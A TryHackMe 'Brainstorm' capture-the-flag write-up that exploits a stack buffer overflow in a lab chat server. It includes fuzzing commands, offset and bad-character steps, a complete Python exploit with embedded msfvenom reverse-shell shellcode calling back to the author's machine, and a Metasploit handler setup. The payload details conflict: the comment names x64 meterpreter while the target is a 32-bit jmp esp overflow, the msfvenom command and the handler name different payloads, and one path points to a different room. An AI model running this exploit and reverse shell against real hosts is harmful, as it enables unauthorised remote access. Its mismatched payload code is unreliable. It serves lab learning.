Brainstorm TryHackMe

Surya Dev Singh
Published in InfoSec Write-ups
7 min read, Aug 20, 2022

Reverse engineer a chat program and write a script to exploit a Windows machine.

✅ Information Gathering

RustScan open port enumeration

So we found three open ports:

  • 21 FTP
  • 3389 RDP
  • 9999 abyss (nmap's guess; in fact a custom service)

Let's first enumerate the FTP port.

✅ Port 21 FTP

As you can see, I got access to FTP with the anonymous username and password, and found two interesting files:

  • chatserver.exe
  • essfunc.dll

So I downloaded both of them to my machine using the FTP get command.

✅ Port 9999

I was not really sure what this port does, but most probably it is the chat server. Let's check by connecting to it with nc (netcat).

And yes, it is the chat server: it asks for a username and the message you want to send.

Since this is a buffer-overflow-themed machine, the chat server is likely vulnerable to a buffer overflow; let's test it.

As you can see above, I sent a bunch of A's as the username and a bunch of A's as the message.

The chat server limits the username to a maximum of 20 characters, but there is no restriction on the message length.

Let's reverse engineer the program.

We already have chatserver.exe and essfunc.dll, the DLL that chatserver.exe needs to run, so we can analyse it locally.

✅ Reversing chatserver.exe for buffer overflow

Prerequisites:

  • a Windows VM
  • Immunity Debugger installed on the Windows VM
  • the mona.py script configured in Immunity Debugger

Open chatserver.exe with Immunity Debugger. The first time you start the binary in the debugger, Windows Firewall will ask whether to allow or deny the connection; just allow it.

Click the play button in Immunity Debugger to start the binary. Once it is running, let's see whether the application crashes when we send it a bunch of A's.

✅ Fuzzing

First configure mona's working folder so that its output files are easy to find:
!mona config -set workingfolder c:\mona\%p

We can generate a bunch of A's with Python and pipe them to the server with nc, as below, or copy and paste them into the message manually.

python -c 'print("test\r\n"+"A"*3000)' | nc 10.0.2.8 9999

And yes, it crashes the application: I sent around 3000 A's, which confirms that the application is vulnerable to a buffer overflow.

✅ Finding offset

To find the offset, we first create a cyclic pattern. We can create it either with pwntools or with Metasploit; I will use Metasploit:

/usr/bin/msf-pattern_create -l 3000

Now I send this pattern as the message to the chatserver.exe program.

The application crashes, and we note down the value of the EIP register.

So the value of the EIP Register is: 31704330

Now, using the EIP value above, we find the offset with:

/usr/bin/msf-pattern_offset -l 3000 -q 31704330
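To show what msf-pattern_offset is doing under the hood, here is an added example (not code from the write-up) that re-implements the Metasploit cyclic pattern and recovers the offset from the EIP value 0x31704330 noted above; it assumes the pattern length 3000 used on the page.

```python
# Added example, not from the original write-up: pure-Python version of the
# msf-pattern_create / msf-pattern_offset logic.
import struct
from string import ascii_uppercase, ascii_lowercase, digits


def pattern_create(length: int) -> bytes:
    """Build the cyclic 'Aa0Aa1Aa2...' pattern used by msf-pattern_create.

    Each 3-byte group is upper + lower + digit, so any 4 consecutive bytes
    appear only once in the first 26*26*10*3 = 20280 bytes.
    """
    out = bytearray()
    for up in ascii_uppercase:
        for low in ascii_lowercase:
            for dig in digits:
                out += (up + low + dig).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def eip_to_bytes(eip: int) -> bytes:
    """Return the 4 bytes as they were laid out in memory.

    x86 is little-endian, so EIP = 0x31704330 was overwritten by the bytes
    0x30 0x43 0x70 0x31, i.e. b'0Cp1'. struct.pack('<I') reproduces that.
    """
    return struct.pack("<I", eip)


def pattern_offset(eip: int, length: int = 3000) -> int:
    """Offset in the pattern of the 4 bytes that landed in EIP, or -1."""
    return pattern_create(length).find(eip_to_bytes(eip))


if __name__ == "__main__":
    # Same length (3000) and EIP value (31704330) as the write-up
    print(pattern_offset(0x31704330))
```

With the page's values the function returns 2012, the offset the author hard-codes later in the script.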

✅ Finding bad character

First, create a byte array of all characters with mona:

!mona bytearray -b "\x00"

This creates every byte except \x00, which is the universal bad character (it terminates C strings).

It is saved at C:\mona\brainpan\bytearray.txt (mona also writes a binary copy, bytearray.bin, which the compare command below uses).


Or we can also create all the characters with Python:

all_char = ""
for x in range(1, 256):           # skip \x00, the universal bad character
    all_char += "\\x" + "{:02x}".format(x)
print(all_char)

Or we can use the badchars pip module (pip install badchars) and generate the byte array in Python syntax with:

badchars -f python

✅ Creating the buffer overflow script:

#!/usr/bin/env python3
import sys
import socket

offset = 2012
# every byte except \x00 (the universal bad character), same as mona's bytearray
all_char = bytes(range(1, 256))
# "BBBB" lands in EIP, the byte array lands where ESP points after the crash
buffer = b"A" * offset + b"BBBB" + all_char

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.0.2.8", 9999))
    s.send(b"testuser" + b"\r\n")   # answer the username prompt
    s.recv(1024)
    s.send(buffer + b"\r\n")        # answer the message prompt
    s.recv(1024)
    s.close()
except socket.error as e:
    print("error:", e)
    sys.exit(1)

After executing the script above, the program crashed. Now we can find the bad characters by comparing the bytes in memory with the byte array mona generated earlier.

As you can see, the program crashed with EIP (instruction pointer) = 42424242 (the "BBBB" from the script above) and ESP (stack pointer) = 00A6EEA8.

Now we can use mona to find the bad characters:

!mona compare -f C:\mona\brainpan\bytearray.bin -a <ESP_ADDRESS>

As you can see, we got the result:

It says "Unmodified", meaning there are no bad characters other than \x00, the universal bad character we already excluded.
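The check that "!mona compare" performs, written out by hand as an added example (not code from the write-up): the byte array we sent is lined up with the bytes read back at ESP, and the first divergence names the candidate bad character. The memory dumps below are constructed; the first mimics the page's "Unmodified" result, the others show what a stripped or truncating byte would look like.

```python
# Added example, not from the original write-up: manual version of the
# bad-character comparison mona does against the bytes at ESP.
SENT = bytes(range(1, 256))   # same content as !mona bytearray -b "\x00"


def find_bad_chars(sent: bytes, in_memory: bytes) -> dict:
    """Compare what we sent with what ended up in memory.

    Only the first divergence is trustworthy per run: a bad character usually
    shifts or garbles everything after it, so the workflow is "exclude the
    first one, regenerate, send again" until the result is Unmodified.
    """
    for i, (a, b) in enumerate(zip(sent, in_memory)):
        if a != b:
            return {"status": "Corrupted", "offset": i, "bad_char": f"\\x{a:02x}"}
    if len(in_memory) < len(sent):
        # memory stops early: the byte that should come next cut the string
        i = len(in_memory)
        return {"status": "Truncated", "offset": i, "bad_char": f"\\x{sent[i]:02x}"}
    return {"status": "Unmodified"}


def next_bytearray(excluded: set) -> bytes:
    """Regenerate the byte array without the bad characters found so far
    (what !mona bytearray -b "\x00\x0a" would produce)."""
    return bytes(b for b in range(256) if b not in excluded)


# Constructed sample dumps (not real captures from the chat server):
CLEAN_DUMP = bytes(range(1, 256))                      # page's result
NEWLINE_STRIPPED_DUMP = bytes(b for b in range(1, 256) if b != 0x0a)
TRUNCATED_DUMP = bytes(range(1, 0x0d))                 # stops before \x0d

if __name__ == "__main__":
    for name, dump in [("clean", CLEAN_DUMP),
                       ("newline stripped", NEWLINE_STRIPPED_DUMP),
                       ("truncated", TRUNCATED_DUMP)]:
        print(name, find_bad_chars(SENT, dump))
```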

✅ Finding a jump instruction / return address

We can find it with mona:

!mona jmp -r esp -cpb "ALL_BAD_CHAR"

After executing the command above we got a few candidate jmp esp addresses. We have to pick one from a module with the fewest memory protections enabled (mona lists them for each address); the first one, 0x625014DF, works fine.

To use this address we need to pack it in little-endian byte order (x86 is little-endian), which we can do with Python's struct module:

import struct

def p32(data):
    # pack a 32-bit address as 4 bytes in little-endian order
    return struct.pack('<I', data)

p32(0x625014DF)   # the <RETURN_ADDRESS> found with mona above

✅ Adding NOPs and SHELLCODE Injection

Adding NOPs

When execution jumps to the new EIP, where our shellcode will reside, the encoded shellcode needs a little room on the stack to unpack itself and must not be overwritten, so for safety we add some NOPs in front of it. NOP means "no operation", just do nothing (\x90). We can add a number of NOPs, a multiple of 8 such as 16:

b'\x90'*16

✅ Generate shellcode

We can generate the shellcode with Metasploit using the following command:

msfvenom -p windows/shell/reverse_tcp LHOST=10.0.2.23 LPORT=4444 -b "\x00" -f py -v shellcode

I am going to use a general reverse shell !!

Now just add these two things (NOPs and shellcode) to our buffer.

✅ Final buffer overflow script:

#!/usr/bin/env python3
import sys
import socket
import struct

def p32(data):
    # pack the return address as 4 bytes in little-endian order
    return struct.pack('<I', data)

# bad_char = b"\x00"
offset = 2012
jmp_esp = p32(0x625014DF)       # jmp esp address found with mona
nop_sled = b"\x90" * 16
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.23 LPORT=4444 -b "\x00" -f py -v shellcode
shellcode = b""
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\x92\x4b\x4e"
shellcode += b"\xa0\xc3\x08\xa5\x3a\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\x6e\x03\xcd\x44\x33"
shellcode += b"\xe0\x69\x3a\x92\x4b\x0f\xf1\x82\x58\xf7\x6b"
shellcode += b"\xda\x7a\x9c\xc5\x8b\x83\xf7\x5a\xc4\x03\xc5"
shellcode += b"\xf2\xdb\x40\x2e\x68\xb2\x06\x7f\x69\x8b\x07"
shellcode += b"\x12\x70\xd8\x03\xc5\xd2\x93\x40\x94\xfa\x3e"
shellcode += b"\x77\x2f\xdc\xc1\x24\x85\x7b\x53\x82\x43\xe1"
shellcode += b"\xc2\xc9\x47\xd7\xc0\x03\xc5\xf2\xe3\x83\xe7"
shellcode += b"\x06\xda\x4a\x9e\xe1\x92\x6e\x24\x42\x8a\x40"
shellcode += b"\x4c\xaf\x46\x7a\xa5\x3a\x92\xc0\xce\x28\xc3"
shellcode += b"\x08\xa5\x72\x17\x8b\x3a\xc7\x8b\x09\x75\xb1"
shellcode += b"\xda\x53\x0a\x2b\x83\x28\xf5\x73\x93\x9b\xad"
shellcode += b"\xf6\x8b\xf7\x6c\x7b\x19\x7f\xc6\xed\xf2\xc1"
shellcode += b"\xed\x3b\x44\x03\x7f\x60\x6f\x49\x64\xf3\x9f"
shellcode += b"\x0a\x4f\x61\xfb\xe8\xd0\xcb\xde\x48\x02\x84"
shellcode += b"\xcb\x4d\x9c\xeb\xe7\x93\x16\xe4\x48\x48\x81"
shellcode += b"\x73\x93\x9b\x28\xe1\x48\x04\xed\x7e\x19\x0b"
shellcode += b"\x52\xe9\xc2\xd8\xe4\xb1\x96\xc3\x0f\xf8\x82"
shellcode += b"\x50\xfb\x63\xda\x4a\x9e\xfa\x82\x50\xe4\x63"
shellcode += b"\xd3\x11\x06\x23\x2f\x28\xe4\x68\x6d\xab\x16"
shellcode += b"\xe1\x9a\x52\xed\xb1\x80\xa2\x05\x5f\x3c\xf7"
shellcode += b"\xf8\x73\x2c\x3c\x3d\x92\x9c\x3b\x97\x3a\x92"
shellcode += b"\x0a\x18\xe9\x4a\xee\xed\xbb\x7e\xeb\x4f\xa0"
shellcode += b"\xc3\x41\x2c\xdf\xdb\xf7\x4c\xa0\xd2\x54\xaf"
shellcode += b"\x3a\x90\x5c\x0f\xf4\x8a\x81\x41\x76\x1b\xba"
shellcode += b"\x0f\x1a\x8f\x7f\x83\x3d\x6d\x9e\x02\x29\x29"
shellcode += b"\x60\xa4\x3b\x92\x4b\x17\xe1\x79\x21\x25\x51"
shellcode += b"\x92\xb4\x9b\xca\xc9\x49\xfb\x6a\xc2\x06\x7f"
shellcode += b"\x69\x8e\x39\x65\x72\x6d\x8b\x06\x29\x01\x40"
shellcode += b"\x5a\xfa\xda\xc2\x8f\xe1\x79\xe2\xaa\xe5\x72"
shellcode += b"\xb4\x9b\xe8\x4a\xcf\xcf\x2a\xd3\x13\x02\x29"
shellcode += b"\x21\x40\x2c\xc3\xd3\xf1\xd7\x05\xb7\x69\x5a"
shellcode += b"\xef\x17\x8b\x3a\xaa\x8a\xf7\x6b\x4f\x77\xa3"
shellcode += b"\xdd\xa0\xc3\x08\xed\xb9\x7e\x5b\x06\x29\x21"
shellcode += b"\x45\x94\xf3\xf8\x4f\x0f\xf8\x8b\x81\x5c\x7b"
shellcode += b"\x28\x49\x97\x68\x9c\xf7\x70\xb9\x6a\x4b\x30"
shellcode += b"\xf5\x8b\x8b\x61\x1a\xcc\xc2\xb8\xca\x83\x49"
shellcode += b"\xfc\x52\x92\x5b\x4e\xa0\x82\x50\xed\xb3\x60"
shellcode += b"\x03\x7f\x69\x82\xb2\xfd\x9e\xc1\xae\xb1\x75"
shellcode += b"\x8b\x81\x66\x73\x1b\x8c\x03\x91\x0a\x41\x2c"
shellcode += b"\xca\xda\xc2\x94\xe8\x4a\xf1\xe4\x80\x90\x92"
shellcode += b"\x86\xff\x3c\xdd\x26\xc2\x92\x36\x66\xf8\x82"
shellcode += b"\x5f\xfc\x52\x92\x0b\x4e\xa0\x82\x50\xcf\x3a"
shellcode += b"\xc8\x0a\xf4\xab\xec\x07\x95\xc5\x47\x1c\x17"
shellcode += b"\xe1\x79\x7d\xcb\x77\xf3\xb4\x9b\xe9\x3c\xc6"
shellcode += b"\x4c\x06\x6d\xb4\xb1\xe8\xc2\xcb\xed\x13\x54"
shellcode += b"\x03\xcb\x56\xb6\xbc\xe4\xc5\x75\x13\x24\xa0"
shellcode += b"\x9a\x41\x62\xf8\x62\xfe\xec\xf6\x3c\xdd\xa5"
shellcode += b"\x3a"
buffer = b"A" * offset + jmp_esp + nop_sled + shellcode

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.0.2.8", 9999))
    s.send(b"testuser" + b"\r\n")   # answer the username prompt
    s.recv(1024)
    s.send(buffer + b"\r\n")        # answer the message prompt
    s.recv(1024)
    s.close()
except socket.error as e:
    print("error:", e)
    sys.exit(1)

✅ Exploitation

Open a reverse shell handler with Metasploit:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost eth0
set lport 4444
run

and listen for the reverse connection while executing the script above!!

And finally, we got the reverse shell. Now we can find the root.txt file.

THANK YOU FOR READING MY WRITE-UP!! 👊👊
